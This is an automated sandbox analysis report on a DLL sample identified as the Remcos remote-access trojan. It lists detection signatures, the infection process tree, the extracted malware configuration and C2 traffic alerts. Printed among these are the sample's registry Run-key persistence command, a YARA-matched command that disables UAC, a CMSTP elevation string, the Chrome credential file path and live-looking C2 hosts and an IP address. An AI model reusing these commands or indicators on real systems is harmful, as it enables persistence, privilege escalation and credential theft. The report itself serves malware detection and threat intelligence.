Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
7P7cuKWTfN.dll

Overview

General Information

Sample name:7P7cuKWTfN.dll
renamed because original name is a hash value
Original sample name:8e521953f01b56f163a5d7ca777cdbef86f1d9291bf994d3ba35cb0e89729da0.dll
Analysis ID:1536945
MD5:6d5a39ffb948ce7ff8744e302201f711
SHA1:af806feeb69690f4963eaa146c1debb67a45895d
SHA256:8e521953f01b56f163a5d7ca777cdbef86f1d9291bf994d3ba35cb0e89729da0
Tags:dllgoatratedman-comuser-JAMESWT_MHT
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Contains functionality to bypass UAC (CMSTPLUA)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Creates autostart registry keys with suspicious names
Delayed program exit found
Injects a PE file into a foreign processes
Sigma detected: Rundll32 Execution Without CommandLine Parameters
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Registers a DLL
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Yara signature match

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 7496 cmdline: loaddll32.exe "C:\Users\user\Desktop\7P7cuKWTfN.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)
    • conhost.exe (PID: 7504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7548 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\7P7cuKWTfN.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • rundll32.exe (PID: 7572 cmdline: rundll32.exe "C:\Users\user\Desktop\7P7cuKWTfN.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)
        • cmd.exe (PID: 8008 cmdline: cmd.exe /C reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "*Chrome" /t REG_SZ /d "rundll32.exe C:\Users\user\AppData\Roaming\VIVA_01.dll",EntryPoint /f & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 8024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • reg.exe (PID: 8100 cmdline: reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "*Chrome" /t REG_SZ /d "rundll32.exe C:\Users\user\AppData\Roaming\VIVA_01.dll",EntryPoint /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
        • rundll32.exe (PID: 8016 cmdline: "C:\Windows\SysWOW64\rundll32.exe" MD5: 889B99C52A60DD49227C5E485A016679)
    • regsvr32.exe (PID: 7556 cmdline: regsvr32.exe /s C:\Users\user\Desktop\7P7cuKWTfN.dll MD5: 878E47C8656E53AE8A8A21E927C6F7E0)
      • regsvr32.exe (PID: 8092 cmdline: "C:\Windows\SysWOW64\regsvr32.exe" MD5: 878E47C8656E53AE8A8A21E927C6F7E0)
    • rundll32.exe (PID: 7580 cmdline: rundll32.exe C:\Users\user\Desktop\7P7cuKWTfN.dll,DllCanUnloadNow MD5: 889B99C52A60DD49227C5E485A016679)
      • rundll32.exe (PID: 8072 cmdline: "C:\Windows\SysWOW64\rundll32.exe" MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7644 cmdline: rundll32.exe C:\Users\user\Desktop\7P7cuKWTfN.dll,DllGetClassObject MD5: 889B99C52A60DD49227C5E485A016679)
      • rundll32.exe (PID: 8116 cmdline: "C:\Windows\SysWOW64\rundll32.exe" MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7668 cmdline: rundll32.exe C:\Users\user\Desktop\7P7cuKWTfN.dll,DllRegisterServer MD5: 889B99C52A60DD49227C5E485A016679)
      • rundll32.exe (PID: 8144 cmdline: "C:\Windows\SysWOW64\rundll32.exe" MD5: 889B99C52A60DD49227C5E485A016679)
  • rundll32.exe (PID: 3624 cmdline: "C:\Windows\system32\rundll32.exe" C:\Users\user\AppData\Roaming\VIVA_01.dll,EntryPoint MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 5956 cmdline: "C:\Windows\system32\rundll32.exe" C:\Users\user\AppData\Roaming\VIVA_01.dll,EntryPoint MD5: 889B99C52A60DD49227C5E485A016679)
      • rundll32.exe (PID: 3428 cmdline: "C:\Windows\SysWOW64\rundll32.exe" MD5: 889B99C52A60DD49227C5E485A016679)
  • rundll32.exe (PID: 2588 cmdline: "C:\Windows\system32\rundll32.exe" C:\Users\user\AppData\Roaming\VIVA_01.dll,EntryPoint MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 1136 cmdline: "C:\Windows\system32\rundll32.exe" C:\Users\user\AppData\Roaming\VIVA_01.dll,EntryPoint MD5: 889B99C52A60DD49227C5E485A016679)
      • rundll32.exe (PID: 6104 cmdline: "C:\Windows\SysWOW64\rundll32.exe" MD5: 889B99C52A60DD49227C5E485A016679)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": ["goatratedman.com:4050:0", "extendedbreakfast.com:5140:0"], "Assigned name": "zuma", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "bghtyi-ILS8CA", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": ""}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000018.00000002.2511293001.0000000002B5A000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    00000003.00000002.2232792548.0000000010EC8000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000003.00000002.2232792548.0000000010EC8000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
        00000003.00000002.2232792548.0000000010EC8000.00000040.00000001.01000000.00000003.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
        • 0x6b05e:$a1: Remcos restarted by watchdog!
        • 0x6b5d6:$a3: %02i:%02i:%02i:%03i
        0000000C.00000002.4190687497.0000000002D4A000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          Click to see the 114 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          17.2.rundll32.exe.8f0000.0.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
            17.2.rundll32.exe.8f0000.0.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
              17.2.rundll32.exe.8f0000.0.raw.unpackWindows_Trojan_Remcos_b296e965unknownunknown
              • 0x6c4a8:$a1: Remcos restarted by watchdog!
              • 0x6ca20:$a3: %02i:%02i:%02i:%03i
              17.2.rundll32.exe.8f0000.0.raw.unpackREMCOS_RAT_variantsunknownunknown
              • 0x664fc:$str_a1: C:\Windows\System32\cmd.exe
              • 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
              • 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
              • 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
              • 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
              • 0x6656c:$str_b2: Executing file:
              • 0x675ec:$str_b3: GetDirectListeningPort
              • 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
              • 0x67118:$str_b7: \update.vbs
              • 0x66594:$str_b9: Downloaded file:
              • 0x66580:$str_b10: Downloading file:
              • 0x66624:$str_b12: Failed to upload file:
              • 0x675b4:$str_b13: StartForward
              • 0x675d4:$str_b14: StopForward
              • 0x67070:$str_b15: fso.DeleteFile "
              • 0x67004:$str_b16: On Error Resume Next
              • 0x670a0:$str_b17: fso.DeleteFolder "
              • 0x66614:$str_b18: Uploaded file:
              • 0x665d4:$str_b19: Unable to delete:
              • 0x67038:$str_b20: while fso.FileExists("
              • 0x66ab1:$str_c0: [Firefox StoredLogins not found]
              17.2.rundll32.exe.8f0000.0.raw.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
              • 0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
              • 0x6637c:$s1: CoGetObject
              • 0x66390:$s1: CoGetObject
              • 0x663ac:$s1: CoGetObject
              • 0x70338:$s1: CoGetObject
              • 0x6633c:$s2: Elevation:Administrator!new:
              Click to see the 215 entries

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Rundll32 Execution Without CommandLine Parameters
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\SysWOW64\rundll32.exe", CommandLine: "C:\Windows\SysWOW64\rundll32.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: rundll32.exe "C:\Users\user\Desktop\7P7cuKWTfN.dll",#1, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 7572, ParentProcessName: rundll32.exe, ProcessCommandLine: "C:\Windows\SysWOW64\rundll32.exe", ProcessId: 8016, ProcessName: rundll32.exe
              Sigma detected: CurrentVersion Autorun Keys Modification
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: rundll32.exe C:\Users\user\AppData\Roaming\VIVA_01.dll,EntryPoint, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 8100, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\*Chrome
              Sigma detected: Direct Autorun Keys Modification
              Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "*Chrome" /t REG_SZ /d "rundll32.exe C:\Users\user\AppData\Roaming\VIVA_01.dll",EntryPoint /f , CommandLine: reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "*Chrome" /t REG_SZ /d "rundll32.exe C:\Users\user\AppData\Roaming\VIVA_01.dll",EntryPoint /f , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: cmd.exe /C reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "*Chrome" /t REG_SZ /d "rundll32.exe C:\Users\user\AppData\Roaming\VIVA_01.dll",EntryPoint /f & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8008, ParentProcessName: cmd.exe, ProcessCommandLine: reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "*Chrome" /t REG_SZ /d "rundll32.exe C:\Users\user\AppData\Roaming\VIVA_01.dll",EntryPoint /f , ProcessId: 8100, ProcessName: reg.exe
              Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd.exe /C reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "*Chrome" /t REG_SZ /d "rundll32.exe C:\Users\user\AppData\Roaming\VIVA_01.dll",EntryPoint /f & exit, CommandLine: cmd.exe /C reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "*Chrome" /t REG_SZ /d "rundll32.exe C:\Users\user\AppData\Roaming\VIVA_01.dll",EntryPoint /f & exit, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: rundll32.exe "C:\Users\user\Desktop\7P7cuKWTfN.dll",#1, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 7572, ParentProcessName: rundll32.exe, ProcessCommandLine: cmd.exe /C reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "*Chrome" /t REG_SZ /d "rundll32.exe C:\Users\user\AppData\Roaming\VIVA_01.dll",EntryPoint /f & exit, ProcessId: 8008, ProcessName: cmd.exe

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-18T12:15:02.559383+020020327761Malware Command and Control Activity Detected192.168.2.449735193.233.18.184050TCP
              2024-10-18T12:15:11.097889+020020327761Malware Command and Control Activity Detected192.168.2.449737193.233.18.185140TCP
              2024-10-18T12:15:20.607977+020020327761Malware Command and Control Activity Detected192.168.2.449774193.233.18.184050TCP
              2024-10-18T12:15:29.097370+020020327761Malware Command and Control Activity Detected192.168.2.449817193.233.18.185140TCP
              2024-10-18T12:15:38.607134+020020327761Malware Command and Control Activity Detected192.168.2.449858193.233.18.184050TCP
              2024-10-18T12:15:47.106960+020020327761Malware Command and Control Activity Detected192.168.2.449907193.233.18.185140TCP
              2024-10-18T12:15:56.591358+020020327761Malware Command and Control Activity Detected192.168.2.449960193.233.18.184050TCP
              2024-10-18T12:16:05.072729+020020327761Malware Command and Control Activity Detected192.168.2.450009193.233.18.185140TCP
              2024-10-18T12:16:14.593568+020020327761Malware Command and Control Activity Detected192.168.2.450010193.233.18.184050TCP
              2024-10-18T12:16:23.135021+020020327761Malware Command and Control Activity Detected192.168.2.450011193.233.18.185140TCP
              2024-10-18T12:16:32.623415+020020327761Malware Command and Control Activity Detected192.168.2.450012193.233.18.184050TCP
              2024-10-18T12:16:41.126552+020020327761Malware Command and Control Activity Detected192.168.2.450013193.233.18.185140TCP
              2024-10-18T12:16:50.623194+020020327761Malware Command and Control Activity Detected192.168.2.450014193.233.18.184050TCP
              2024-10-18T12:16:59.110987+020020327761Malware Command and Control Activity Detected192.168.2.450015193.233.18.185140TCP
              2024-10-18T12:17:08.610567+020020327761Malware Command and Control Activity Detected192.168.2.450016193.233.18.184050TCP
              2024-10-18T12:17:17.410636+020020327761Malware Command and Control Activity Detected192.168.2.450017193.233.18.185140TCP
              2024-10-18T12:17:26.922102+020020327761Malware Command and Control Activity Detected192.168.2.450018193.233.18.184050TCP
              2024-10-18T12:17:35.424734+020020327761Malware Command and Control Activity Detected192.168.2.450019193.233.18.185140TCP
              2024-10-18T12:17:44.936419+020020327761Malware Command and Control Activity Detected192.168.2.450020193.233.18.184050TCP
              2024-10-18T12:17:53.425586+020020327761Malware Command and Control Activity Detected192.168.2.450021193.233.18.185140TCP
              2024-10-18T12:18:02.923601+020020327761Malware Command and Control Activity Detected192.168.2.450022193.233.18.184050TCP
              2024-10-18T12:18:11.425822+020020327761Malware Command and Control Activity Detected192.168.2.450023193.233.18.185140TCP
              2024-10-18T12:18:21.003692+020020327761Malware Command and Control Activity Detected192.168.2.450024193.233.18.184050TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: 7P7cuKWTfN.dllAvira: detected
              Antivirus detection for dropped file
              Source: C:\Users\user\AppData\Roaming\VIVA_01.dllAvira: detection malicious, Label: TR/AVI.Remcos.yqazi
              Found malware configuration
              Source: 0000000C.00000002.4190687497.0000000002D4A000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["goatratedman.com:4050:0", "extendedbreakfast.com:5140:0"], "Assigned name": "zuma", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "bghtyi-ILS8CA", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": ""}
              Multi AV Scanner detection for dropped file
              Source: C:\Users\user\AppData\Roaming\VIVA_01.dllReversingLabs: Detection: 47%
              Multi AV Scanner detection for submitted file
              Source: 7P7cuKWTfN.dllReversingLabs: Detection: 47%
              Yara detected Remcos RAT
              Source: Yara matchFile source: 17.2.rundll32.exe.8f0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.rundll32.exe.4240000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.rundll32.exe.5330000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.regsvr32.exe.2a00000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.loaddll32.exe.10ec85b6.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.rundll32.exe.5330000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.regsvr32.exe.5990000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 20.2.rundll32.exe.3850000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.rundll32.exe.2b00000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 20.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 24.2.rundll32.exe.2a40000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.rundll32.exe.4830000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.rundll32.exe.4df0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.regsvr32.exe.5990000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.regsvr32.exe.2a00000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.rundll32.exe.2b00000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.2.rundll32.exe.520000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 20.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.rundll32.exe.4830000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.rundll32.exe.4df0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.loaddll32.exe.10ec85b6.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 20.2.rundll32.exe.3850000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 25.2.rundll32.exe.2a90000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.regsvr32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 24.2.rundll32.exe.2a40000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.2.rundll32.exe.520000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 14.2.rundll32.exe.2b40000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.rundll32.exe.4e10000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.regsvr32.exe.10ec85b6.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 25.2.rundll32.exe.2a90000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.rundll32.exe.4e10000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.rundll32.exe.4240000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 14.2.rundll32.exe.2b40000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.2.rundll32.exe.8f0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000018.00000002.2511293001.0000000002B5A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.2232792548.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.4190687497.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2230948357.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2183813294.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2229503398.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000019.00000002.2592748708.0000000002A90000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2212028354.0000000005330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.2209122864.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2231320155.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000002.2210786919.0000000002C7A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.2229090227.0000000000520000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000019.00000002.2593057749.000000000308A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.2209821177.0000000005990000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.2595336178.0000000010EC8000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.2593046305.0000000004240000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.2194973238.0000000002B40000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2243597399.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2245664796.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000002.2210556963.00000000008F0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2242971963.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.2195089206.0000000002E9A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2230248176.0000000004830000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000014.00000002.2517552201.0000000003850000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000014.00000002.2521295751.0000000010EC8000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000018.00000002.2511207483.0000000002A40000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.2229274510.0000000002B9A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 7496, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 7556, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7572, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7580, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7644, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7668, type: MEMORYSTR
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.9% probability
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02B33837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,12_2_02B33837
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_02A33837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,15_2_02A33837
              Source: loaddll32.exe, 00000000.00000002.2245664796.0000000010EC8000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_1d70fe43-a

              Exploits

              barindex
              Yara detected UAC Bypass using CMSTP
              Source: Yara matchFile source: 17.2.rundll32.exe.8f0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.rundll32.exe.4240000.0.unpack, type: UNPACKEDPE
